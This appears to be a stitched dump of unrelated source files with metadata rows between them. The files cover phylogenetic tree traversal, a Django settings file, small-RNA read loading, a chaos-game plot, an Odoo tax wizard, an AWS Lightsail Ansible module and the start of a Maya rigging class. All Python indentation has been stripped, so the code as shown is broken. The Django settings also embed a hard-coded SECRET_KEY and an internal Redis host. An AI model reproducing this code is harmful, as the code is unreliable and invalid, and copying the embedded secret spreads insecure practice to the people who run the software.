mysys.stdout.write('Node.__del__() node %i (%s) has a cNode (%s). How?!?\n' % (
self.nodeNum, self, self.cNode))
if self.doDataPart:
dp_freeNode(self.cNode)
else:
freeNode(self.cNode)
self.cNode = None
def __init__(self):
self.name = None
self.nodeNum = -1
self.parent = None
self.leftChild = None
self.sibling = None
self.isLeaf = 0
self.cNode = None # Pointer to a c-struct
# Zero-based seq numbering of course, so -1 means no sequence.
self.seqNum = -1
self.br = NodeBranch()
# self.rootCount = None # For cons trees, where the input trees do not
# have bifurcating roots. This is the number of
# compatible input trees that were rooted on this node.
self.parts = [] # NodePart objects
self.doDataPart = 0
self.flag = 0
def wipe(self):
"""Set the pointers parent, leftChild, and sibling to None"""
self.parent = None
self.leftChild = None
self.sibling = None
def rightmostChild(self):
"""Find and return the rightmostChild of self.
If self has no children, return None.
"""
n = self.leftChild
if not n:
return None
while n.sibling:
n = n.sibling
return n
def leftSibling(self):
"""Find and return the sibling on the left.
A node has a pointer to its sibling, but that is the sibling
on the right. It is a bit awkward to find the sibling on the
left, as you need to go via the parent and the leftChild of
the parent.
If there is no parent, return None. If there is no
leftSibling, return None.
"""
if not self.parent:
# print 'leftSibling(%i). No parent. returning None.' %
# self.nodeNum
return None
lsib = self.parent.leftChild
if lsib == self:
# print 'leftSibling(%i). self is self.parent.leftChild.
# returning None.' % self.nodeNum
return None
while lsib:
if lsib.sibling == self:
# print 'leftSibling(%i): returning node %i' % (self.nodeNum,
# lsib.nodeNum)
return lsib
lsib = lsib.sibling
# These next 3 were suggestions from Rick Ree. Thanks, Rick!
# Then I added a couple more. Note that all of these use
# recursion, and so could bump into the recursion limit, and might
# fail on large trees. However, I tried iterPreOrder() on a
# random tree of 10,000 taxa, and it was fine.
# You can temporarily set a different recursion limit with the sys module.
# oldlimit = sys.getrecursionlimit()
# sys.setrecursionlimit(newLimit)
# See also Tree.iterNodesNoRoot()
def iterChildren(self):
n = self.leftChild
while n:
yield n
n = n.sibling
def iterPostOrder(self):
for c in self.iterChildren():
for n in c.iterPostOrder():
yield n
yield self
def iterPreOrder(self):
yield self
for c in self.iterChildren():
for n in c.iterPreOrder():
yield n
def iterLeaves(self):
for n in self.iterPreOrder():
if n.isLeaf:
yield n
def iterInternals(self):
for n in self.iterPreOrder():
if not n.isLeaf:
yield n
def iterDown(self, showDown=False):
"""Iterates over all the nodes below self (including self)
Starts by returning self. And then iterates over all nodes below self.
It does so by a combination of Node.iterPreOrder() and
Node.iterDown() (ie recursively). Now sometimes we want to
know if the nodes that are returned come from iterDown()
(strictly) or not (ie from iterPreOrder()). If that bit of
info is needed, then you can turn on the arg ``showDown``.
(The following is probably bad Python practice!) When that is done, whenever
iterDown() is called the first node that is returned will have
the attribute ``down`` set to True. But after it is returned,
that ``down`` attribute is zapped (to try to keep the bloat
down ...). So you need to test ``if hasattr(yourNode,
'down'):`` before you actually use it.
"""
if showDown:
self.down = True
yield self
if showDown:
del(self.down)
if self.parent:
for c in self.parent.iterChildren():
if c == self:
for n in c.parent.iterDown(showDown):
yield n
else:
for n in c.iterPreOrder():
yield n
# ###############################
def getNChildren(self):
"""Returns the number of children that the node has."""
if not self.leftChild:
return 0
c = self.leftChild
counter = 0
while c:
c = c.sibling
counter += 1
return counter
def isAncestorOf(self, otherNode):
"""Asks whether self is an an ancestor of otherNode."""
n = otherNode
while 1:
n = n.parent
if not n:
return False
elif n == self:
return True
def _ladderize(self, biggerGroupsOnBottom):
"""This is only used by Tree.ladderize()."""
# print '====Node %i' % self.nodeNum
if not self.leftChild:
pass
else:
nLeaves = []
children = []
ch = self.leftChild
while ch:
nL = len([n2 for n2 in ch.iterLeaves()])
nLeaves.append(nL)
ch.nLeaves = nL
children.append(ch)
ch = ch.sibling
# print ' nLeaves = %s' % nLeaves
allOnes = True
for ch in children:
if ch.nLeaves > 1:
allOnes = False
break
if not allOnes:
children = func.sortListOfObjectsOnAttribute(
children, 'nLeaves')
if not biggerGroupsOnBottom:
children.reverse()
# print '\n Children\n ------------'
# for ch in children:
# print ' node=%i, nLeaves=%i' % (ch.nodeNum, ch.nLeaves)
self.leftChild = children[0]
theLeftChild = self.leftChild
theLeftChild.sibling = None
for ch in children[1:]:
theLeftChild.sibling = ch
theLeftChild = ch
theLeftChild.sibling = None
for ch in children:
del(ch.nLeaves)
for ch in self.iterChildren():
ch._ladderize(biggerGroupsOnBottom)
|
gpl-2.0
| -8,003,872,318,049,479,000 | 32.619926 | 93 | 0.537482 | false |
madre/analytics_nvd3
|
analytics/settings.py
|
1
|
5979
|
# Django settings for analytics project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
APPLICATION_DIR = os.path.dirname(globals()['__file__'])
PROJECT_ROOT = os.path.abspath(
os.path.join(os.path.dirname(__file__), ".."),
)
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'analytics.db', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
TIME_ZONE = 'Asia/Shanghai'
LANGUAGE_CODE = 'zh-CN'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, '')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'sq)9^f#mf444c(#om$zpo0v!%y=%pqem*9s_fewfsxfwr_&x40u'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'analytics.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'analytics.wsgi.application'
TEMPLATE_DIRS = (os.path.join(APPLICATION_DIR, 'templates'), )
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_nvd3',
'demo',
'account',
'user_analytics',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
LOGIN_URL = "/accounts/login/"
# Django extensions
try:
import django_extensions
except ImportError:
pass
else:
INSTALLED_APPS = INSTALLED_APPS + ('django_extensions',)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
CACHES = {
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': '192.168.199.8:6379',
'TIMEOUT': 3600,
'OPTIONS': {
'DB': 16,
'MAX_ENTRIES': 10000,
},
}
}
REDIS_HOST = '192.168.199.8'
REDIS_PORT = 6379
REDIS_DB = 16
import ConfigParser
from StringIO import StringIO
SERVER_CONF = ConfigParser.RawConfigParser()
try:
with open('server.conf', 'rb') as f:
content = f.read().decode('utf-8-sig').encode('utf8')
try:
SERVER_CONF.readfp(StringIO(content))
except ConfigParser.MissingSectionHeaderError:
content_str = "[default]\n" + content
SERVER_CONF.readfp(StringIO(content_str))
except IOError:
pass
# IMPORT LOCAL SETTINGS
# =====================
try:
from settings_local import *
except ImportError:
pass
|
apache-2.0
| 4,597,947,349,156,701,700 | 28.024272 | 127 | 0.662151 | false |
Carroll-Lab/scram
|
scram_modules/srnaseq.py
|
1
|
5630
|
'''
Small RNA storage class
Stores unique sequence and read count in an internal dictionary.
Automatic normalisation to RPMR once loaded from file
'''
from scram_modules.dna import DNA
import time
class SRNASeq(object):
def __init__(self):
self._internal_dict = {} # internal dictionary for class
def __setitem__(self, sequence, count):
self._internal_dict[sequence] = count # {sequence:count}
def __getitem__(self, sequence):
return self._internal_dict[sequence] # get count for sequence
def __iter__(self):
return iter(self._internal_dict.items()) # iterable
def __len__(self):
return len(self._internal_dict) # number of sequences stored
def __contains__(self, sequence):
return sequence in self._internal_dict # true if sequence stored
def sRNAs(self):
return self._internal_dict.keys() # returns a view of all sequences
def counts(self):
return self._internal_dict.values() # returns a view all counts
def load_seq_file(self, seq_file, sRNA_max_len_cutoff, min_reads, sRNA_min_len_cutoff):
"""
Load collapsed FASTA sequence file
eg. >1-43456
AAAAAAATTTTTATATATATA
Calculate RPMR and apply in function
:param seq_file: path/to/seq/file (str)
:param sRNA_max_len_cutoff: only reads of length <= sRNA_max_len_cutoff loaded (int)
:param min_reads: only reads >= min_reads count loaded (int)
:param sRNA_min_len_cutoff: only reads of length >= sRNA_min_len_cutoff loaded (int)
"""
start = time.clock()
_seq_dict = {}
read_count = self._single_seq_file_load(_seq_dict, min_reads, sRNA_max_len_cutoff, sRNA_min_len_cutoff,
seq_file)
# final RPMR - could simplify in future
for sRNA, count in _seq_dict.items():
self._internal_dict[sRNA] = count * (float(1000000) / read_count)
print("\n{0} load time = {1} seconds for {2} reads".format(seq_file.split('/')[-1],
str((time.clock() - start)), read_count))
print("-" * 50)
def load_seq_file_arg_list(self, seq_file_arg_list, sRNA_max_len_cutoff,
min_reads, sRNA_min_len_cutoff):
"""
Load collapsed FASTA sequence files from the list - generate single SRNA_seq object with mean
eg. >1-43456
AAAAAAATTTTTATATATATA
Calculate RPMR and apply in function
:param seq_file_arg_list: list of seq_file Paths [path/to/seq/file (str),.....] (list)
:param sRNA_max_len_cutoff: only reads of length <= sRNA_max_len_cutoff loaded (int)
:param min_reads: only reads >= min_reads count loaded (int)
:param sRNA_min_len_cutoff: only reads of length >= sRNA_min_len_cutoff loaded (int)
"""
start = time.clock()
# read_count_1 = 0
indv_seq_dict_list = [] # list of individual seq_dics
indv_seq_dict_list_factor = [] # RPMR for each seq. disc
for seq_file in seq_file_arg_list:
single_start = time.clock()
_seq_dict = {}
read_count = self._single_seq_file_load(_seq_dict, min_reads, sRNA_max_len_cutoff, sRNA_min_len_cutoff,
seq_file)
indv_seq_dict_list.append(_seq_dict)
indv_seq_dict_list_factor.append(float(1000000) / read_count)
print("\n{0} load time = {1} seconds for {2} reads".format(seq_file.split('/')[-1],
str((time.clock() - single_start)), read_count))
for sRNA, count in indv_seq_dict_list[0].items():
if all(sRNA in d for d in indv_seq_dict_list):
total_count = 0
for i in range(len(indv_seq_dict_list)):
total_count += (indv_seq_dict_list[i][sRNA] * indv_seq_dict_list_factor[i])
self._internal_dict[sRNA] = total_count / len(indv_seq_dict_list)
print("\nTotal sequence file processing time = " \
+ str((time.clock() - start)) + " seconds\n")
print("-" * 50)
def _single_seq_file_load(self, _seq_dict, min_reads, sRNA_max_len_cutoff, sRNA_min_len_cutoff, seq_file):
"""
Internal class function for a single seq file load. No normalisation.
:param _seq_dict: class internal dict for loading collapsed fasta file {sRNA;count} (dict)
:param min_reads: only reads >= min_reads count loaded (int)
:param sRNA_max_len_cutoff: only reads of length <= sRNA_max_len_cutoff loaded (int)
:param sRNA_min_len_cutoff: only reads of length >= sRNA_min_len_cutoff loaded (int)
:param seq_file: path/to/seq/file (str)
:return: total read count for the file (inside of cutoffs) (int)
"""
read_count = 0
with open(seq_file, 'r') as loaded_seq:
next_line = False
for line in loaded_seq:
line = line.strip()
if line[0] == '>':
count = int(line.split('-')[1])
next_line = True
elif count >= min_reads and sRNA_min_len_cutoff <= len(line) <= sRNA_max_len_cutoff and next_line:
_seq_dict[DNA(line)] = count
read_count += count
next_line = False
else:
pass
loaded_seq.close()
return read_count
|
mit
| 7,421,789,612,106,621,000 | 41.659091 | 119 | 0.561634 | false |
sergiohzlz/complejos
|
JdelC/jdelc.py
|
1
|
2211
|
#!/usr/bin/python
import numpy as np
import numpy.random as rnd
import sys
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot as plt
from numpy import pi
poligono_p = lambda n,rot: [(1,i*2*np.pi/n+rot) for i in range(1,n+1)]
pol2cart = lambda ro,te: (ro*np.cos(te),ro*np.sin(te))
poligono_c = lambda L: [pol2cart(x[0],x[1]) for x in L]
genera_coords = lambda L,p: dict(zip(L,p))
pmedio = lambda x,y: (0.5*(x[0]+y[0]) , 0.5*(x[1]+y[1]) )
class JdelC(object):
def __init__(self):
pass
def juego(n,m=100000, rot=pi/2):
C = genera_coords(range(n), poligono_c(poligono_p(n,rot)))
P = [C[rnd.choice(range(n))]]
for i in range(m):
up = P[-1]
vz = C[rnd.choice(range(n))]
P.append(pmedio(up,vz))
return np.array(P), C
def juego_sec(V,S,m=100000,rot=pi/4):
n = len(V)
C = genera_coords(V, poligono_c(poligono_p(n,rot)))
P = [C[S[0]]]
cont = 0
for i in range(1,m):
up = P[-1]
vz = C[S[i]]
P.append(pmedio(up,vz))
return np.array(P), C
def secciones_nucleotidos(f,m):
cont=0
for r in f:
l = r.strip()
if(l[0]=='>'):
continue
acum = m-cont
sec = ''.join([ s for s in l[:acum] if s!='N' ])
cont+=len(sec)
if(cont<=m):
yield sec
def secciones(f,m):
cont=0
for r in f:
l = r.strip()
try:
if(l[0]=='>'):
continue
except:
continue
acum = m-cont
sec = ''.join([ s for s in l[:acum] ])
cont+=len(sec)
if(cont<=m):
yield sec
def grafica(R):
plt.scatter(R[:,0],R[:,1],s=0.1, c='k')
def grafcoords(*D):
R,C = D
plt.scatter(R[:,0],R[:,1],s=0.1, c='k')
for c in C:
plt.annotate(c,C[c])
if __name__=='__main__':
n = int(sys.argv[0])
# Ejemplo
# In [150]: G = open('Saccharomyces_cerevisiae_aa.fasta','r')
#
# In [151]: secs = jdelc.secciones(G,1000)
#
# In [152]: secuencia = ''
#
# In [153]: for sec in secs:
# ...: secuencia += sec
# ...:
#
# In [154]: R,C = jdelc.juego_sec(aminos,secuencia, len(secuencia),pi/4); jdelc.grafcoords(R,C); show()
|
gpl-2.0
| 6,357,678,241,620,429,000 | 23.032609 | 103 | 0.517413 | false |
akretion/l10n-brazil
|
l10n_br_account_product/models/wizard_account_product_fiscal_classification.py
|
1
|
4195
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Renato Lima - Akretion
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from odoo import models, api
class WizardAccountProductFiscalClassification(models.TransientModel):
_inherit = 'wizard.account.product.fiscal.classification'
@api.multi
def action_create(self):
obj_tax = self.env['account.tax']
obj_tax_code = self.env['account.tax.code']
obj_tax_code_template = self.env['account.tax.code.template']
obj_tax_template = self.env['account.tax.template']
obj_fc = self.env['account.product.fiscal.classification']
obj_tax_purchase = self.env['l10n_br_tax.definition.purchase']
obj_tax_sale = self.env['l10n_br_tax.definition.sale']
obj_fc_template = self.env[
'account.product.fiscal.classification.template']
def map_taxes_codes(tax_definition, tax_type='sale'):
for line in tax_definition:
for company in companies:
if company_taxes[company].get(line.tax_template_id.id):
tax_def_domain = [
('tax_id', '=', company_taxes[
company].get(line.tax_template_id.id)),
('fiscal_classification_id', '=', fc_id.id),
('company_id', '=', company)]
if tax_type == 'sale':
obj_tax_def = obj_tax_sale
else:
obj_tax_def = obj_tax_purchase
tax_def_result = obj_tax_def.search(tax_def_domain)
values = {
'tax_id': company_taxes[company].get(
line.tax_template_id.id),
'tax_code_id': company_codes[company].get(
line.tax_code_template_id.id),
'company_id': company,
'fiscal_classification_id': fc_id.id,
}
if tax_def_result:
tax_def_result.write(values)
else:
obj_tax_def.create(values)
return True
company_id = self.company_id.id
companies = []
if company_id:
companies.append(company_id)
else:
companies = self.env['res.company'].sudo().search([]).ids
company_taxes = {}
company_codes = {}
for company in companies:
company_taxes[company] = {}
company_codes[company] = {}
for tax in obj_tax.sudo().search([('company_id', '=', company)]):
tax_template = obj_tax_template.search(
[('name', '=', tax.name)])
if tax_template:
company_taxes[company][tax_template[0].id] = tax.id
for code in obj_tax_code.sudo().search(
[('company_id', '=', company)]):
code_template = obj_tax_code_template.search(
[('name', '=', code.name)])
if code_template:
company_codes[company][code_template[0].id] = code.id
for fc_template in obj_fc_template.search([]):
fc_id = obj_fc.search([('name', '=', fc_template.name)])
if not fc_id:
vals = {
'active': fc_template.active,
'code': fc_template.code,
'name': fc_template.name,
'description': fc_template.description,
'company_id': company_id,
'type': fc_template.type,
'note': fc_template.note,
'inv_copy_note': fc_template.inv_copy_note,
}
fc_id = obj_fc.sudo().create(vals)
map_taxes_codes(fc_template.sale_tax_definition_line,
'sale')
map_taxes_codes(fc_template.purchase_tax_definition_line,
'purchase')
return True
|
agpl-3.0
| -2,054,643,602,962,127,600 | 36.455357 | 77 | 0.476996 | false |
jbenden/ansible
|
lib/ansible/modules/cloud/amazon/lightsail.py
|
1
|
15824
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = '''
---
module: lightsail
short_description: Create or delete a virtual machine instance in AWS Lightsail
description:
- Creates or instances in AWS Lightsail and optionally wait for it to be 'running'.
version_added: "2.4"
author: "Nick Ball (@nickball)"
options:
state:
description:
- Indicate desired state of the target.
default: present
choices: ['present', 'absent', 'running', 'restarted', 'stopped']
name:
description:
- Name of the instance
required: true
default : null
zone:
description:
- AWS availability zone in which to launch the instance. Required when state='present'
required: false
default: null
blueprint_id:
description:
- ID of the instance blueprint image. Required when state='present'
required: false
default: null
bundle_id:
description:
- Bundle of specification info for the instance. Required when state='present'
required: false
default: null
user_data:
description:
- Launch script that can configure the instance with additional data
required: false
default: null
key_pair_name:
description:
- Name of the key pair to use with the instance
required: false
default: null
wait:
description:
- Wait for the instance to be in state 'running' before returning. If wait is "no" an ip_address may not be returned
default: "yes"
choices: [ "yes", "no" ]
wait_timeout:
description:
- How long before wait gives up, in seconds.
default: 300
requirements:
- "python >= 2.6"
- boto3
extends_documentation_fragment: aws
'''
EXAMPLES = '''
# Create a new Lightsail instance, register the instance details
- lightsail:
state: present
name: myinstance
region: us-east-1
zone: us-east-1a
blueprint_id: ubuntu_16_04
bundle_id: nano_1_0
key_pair_name: id_rsa
user_data: " echo 'hello world' > /home/ubuntu/test.txt"
wait_timeout: 500
register: my_instance
- debug:
msg: "Name is {{ my_instance.instance.name }}"
- debug:
msg: "IP is {{ my_instance.instance.publicIpAddress }}"
# Delete an instance if present
- lightsail:
state: absent
region: us-east-1
name: myinstance
'''
RETURN = '''
changed:
description: if a snapshot has been modified/created
returned: always
type: bool
sample:
changed: true
instance:
description: instance data
returned: always
type: dict
sample:
arn: "arn:aws:lightsail:us-east-1:448830907657:Instance/1fef0175-d6c8-480e-84fa-214f969cda87"
blueprint_id: "ubuntu_16_04"
blueprint_name: "Ubuntu"
bundle_id: "nano_1_0"
created_at: "2017-03-27T08:38:59.714000-04:00"
hardware:
cpu_count: 1
ram_size_in_gb: 0.5
is_static_ip: false
location:
availability_zone: "us-east-1a"
region_name: "us-east-1"
name: "my_instance"
networking:
monthly_transfer:
gb_per_month_allocated: 1024
ports:
- access_direction: "inbound"
access_from: "Anywhere (0.0.0.0/0)"
access_type: "public"
common_name: ""
from_port: 80
protocol: tcp
to_port: 80
- access_direction: "inbound"
access_from: "Anywhere (0.0.0.0/0)"
access_type: "public"
common_name: ""
from_port: 22
protocol: tcp
to_port: 22
private_ip_address: "172.26.8.14"
public_ip_address: "34.207.152.202"
resource_type: "Instance"
ssh_key_name: "keypair"
state:
code: 16
name: running
support_code: "588307843083/i-0997c97831ee21e33"
username: "ubuntu"
'''
import time
import traceback
try:
import botocore
HAS_BOTOCORE = True
except ImportError:
HAS_BOTOCORE = False
try:
import boto3
except ImportError:
# will be caught by imported HAS_BOTO3
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (ec2_argument_spec, get_aws_connection_info, boto3_conn,
HAS_BOTO3, camel_dict_to_snake_dict)
def create_instance(module, client, instance_name):
"""
Create an instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to delete
Returns a dictionary of instance information
about the new instance.
"""
changed = False
# Check if instance already exists
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
zone = module.params.get('zone')
blueprint_id = module.params.get('blueprint_id')
bundle_id = module.params.get('bundle_id')
key_pair_name = module.params.get('key_pair_name')
user_data = module.params.get('user_data')
user_data = '' if user_data is None else user_data
resp = None
if inst is None:
try:
resp = client.create_instances(
instanceNames=[
instance_name
],
availabilityZone=zone,
blueprintId=blueprint_id,
bundleId=bundle_id,
userData=user_data,
keyPairName=key_pair_name,
)
resp = resp['operations'][0]
except botocore.exceptions.ClientError as e:
module.fail_json(msg='Unable to create instance {0}, error: {1}'.format(instance_name, e))
changed = True
inst = _find_instance_info(client, instance_name)
return (changed, inst)
def delete_instance(module, client, instance_name):
"""
Terminates an instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to delete
Returns a dictionary of instance information
about the instance deleted (pre-deletion).
If the instance to be deleted is running
"changed" will be set to False.
"""
# It looks like deleting removes the instance immediately, nothing to wait for
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
wait_max = time.time() + wait_timeout
changed = False
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
# Wait for instance to exit transition state before deleting
if wait:
while wait_max > time.time() and inst is not None and inst['state']['name'] in ('pending', 'stopping'):
try:
time.sleep(5)
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['ResponseMetadata']['HTTPStatusCode'] == "403":
module.fail_json(msg="Failed to delete instance {0}. Check that you have permissions to perform the operation.".format(instance_name),
exception=traceback.format_exc())
elif e.response['Error']['Code'] == "RequestExpired":
module.fail_json(msg="RequestExpired: Failed to delete instance {0}.".format(instance_name), exception=traceback.format_exc())
# sleep and retry
time.sleep(10)
# Attempt to delete
if inst is not None:
while not changed and ((wait and wait_max > time.time()) or (not wait)):
try:
client.delete_instance(instanceName=instance_name)
changed = True
except botocore.exceptions.ClientError as e:
module.fail_json(msg='Error deleting instance {0}, error: {1}'.format(instance_name, e))
# Timed out
if wait and not changed and wait_max <= time.time():
module.fail_json(msg="wait for instance delete timeout at %s" % time.asctime())
return (changed, inst)
def restart_instance(module, client, instance_name):
"""
Reboot an existing instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to reboot
Returns a dictionary of instance information
about the restarted instance
If the instance was not able to reboot,
"changed" will be set to False.
Wait will not apply here as this is an OS-level operation
"""
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
wait_max = time.time() + wait_timeout
changed = False
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
# Wait for instance to exit transition state before state change
if wait:
while wait_max > time.time() and inst is not None and inst['state']['name'] in ('pending', 'stopping'):
try:
time.sleep(5)
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['ResponseMetadata']['HTTPStatusCode'] == "403":
module.fail_json(msg="Failed to restart instance {0}. Check that you have permissions to perform the operation.".format(instance_name),
exception=traceback.format_exc())
elif e.response['Error']['Code'] == "RequestExpired":
module.fail_json(msg="RequestExpired: Failed to restart instance {0}.".format(instance_name), exception=traceback.format_exc())
time.sleep(3)
# send reboot
if inst is not None:
try:
client.reboot_instance(instanceName=instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Unable to reboot instance {0}, error: {1}'.format(instance_name, e))
changed = True
return (changed, inst)
def startstop_instance(module, client, instance_name, state):
"""
Starts or stops an existing instance
module: Ansible module object
client: authenticated lightsail connection object
instance_name: name of instance to start/stop
state: Target state ("running" or "stopped")
Returns a dictionary of instance information
about the instance started/stopped
If the instance was not able to state change,
"changed" will be set to False.
"""
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
wait_max = time.time() + wait_timeout
changed = False
inst = None
try:
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'NotFoundException':
module.fail_json(msg='Error finding instance {0}, error: {1}'.format(instance_name, e))
# Wait for instance to exit transition state before state change
if wait:
while wait_max > time.time() and inst is not None and inst['state']['name'] in ('pending', 'stopping'):
try:
time.sleep(5)
inst = _find_instance_info(client, instance_name)
except botocore.exceptions.ClientError as e:
if e.response['ResponseMetadata']['HTTPStatusCode'] == "403":
module.fail_json(msg="Failed to start/stop instance {0}. Check that you have permissions to perform the operation".format(instance_name),
exception=traceback.format_exc())
elif e.response['Error']['Code'] == "RequestExpired":
module.fail_json(msg="RequestExpired: Failed to start/stop instance {0}.".format(instance_name), exception=traceback.format_exc())
time.sleep(1)
# Try state change
if inst is not None and inst['state']['name'] != state:
try:
if state == 'running':
client.start_instance(instanceName=instance_name)
else:
client.stop_instance(instanceName=instance_name)
except botocore.exceptions.ClientError as e:
module.fail_json(msg='Unable to change state for instance {0}, error: {1}'.format(instance_name, e))
changed = True
# Grab current instance info
inst = _find_instance_info(client, instance_name)
return (changed, inst)
def core(module):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if not region:
module.fail_json(msg='region must be specified')
client = None
try:
client = boto3_conn(module, conn_type='client', resource='lightsail',
region=region, endpoint=ec2_url, **aws_connect_kwargs)
except (botocore.exceptions.ClientError, botocore.exceptions.ValidationError) as e:
module.fail_json('Failed while connecting to the lightsail service: %s' % e, exception=traceback.format_exc())
changed = False
state = module.params['state']
name = module.params['name']
if state == 'absent':
changed, instance_dict = delete_instance(module, client, name)
elif state in ('running', 'stopped'):
changed, instance_dict = startstop_instance(module, client, name, state)
elif state == 'restarted':
changed, instance_dict = restart_instance(module, client, name)
elif state == 'present':
changed, instance_dict = create_instance(module, client, name)
module.exit_json(changed=changed, instance=camel_dict_to_snake_dict(instance_dict))
def _find_instance_info(client, instance_name):
''' handle exceptions where this function is called '''
inst = None
try:
inst = client.get_instance(instanceName=instance_name)
except botocore.exceptions.ClientError as e:
raise
return inst['instance']
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
name=dict(type='str', required=True),
state=dict(type='str', default='present', choices=['present', 'absent', 'stopped', 'running', 'restarted']),
zone=dict(type='str'),
blueprint_id=dict(type='str'),
bundle_id=dict(type='str'),
key_pair_name=dict(type='str'),
user_data=dict(type='str'),
wait=dict(type='bool', default=True),
wait_timeout=dict(default=300),
))
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='Python module "boto3" is missing, please install it')
if not HAS_BOTOCORE:
module.fail_json(msg='Python module "botocore" is missing, please install it')
try:
core(module)
except (botocore.exceptions.ClientError, Exception) as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
|
gpl-3.0
| 8,156,596,528,285,752,000 | 32.525424 | 157 | 0.63132 | false |
Shadowtags/ModularRiggingTool
|
nwModularRiggingTool/Modules/System/controlModule.py
|
1
|
13045
|
import pymel.core as pm
import System.utils as utils
reload(utils)
from functools import partial
class ControlModule:
def __init__(self, _moduleNamespace):
# Class variables
self.moduleContainer = None
self.blueprintNamespace = ''
self.moduleNamespace = ''
self.characterNamespace = ''
self.publishedNames = []
if _moduleNamespace == None:
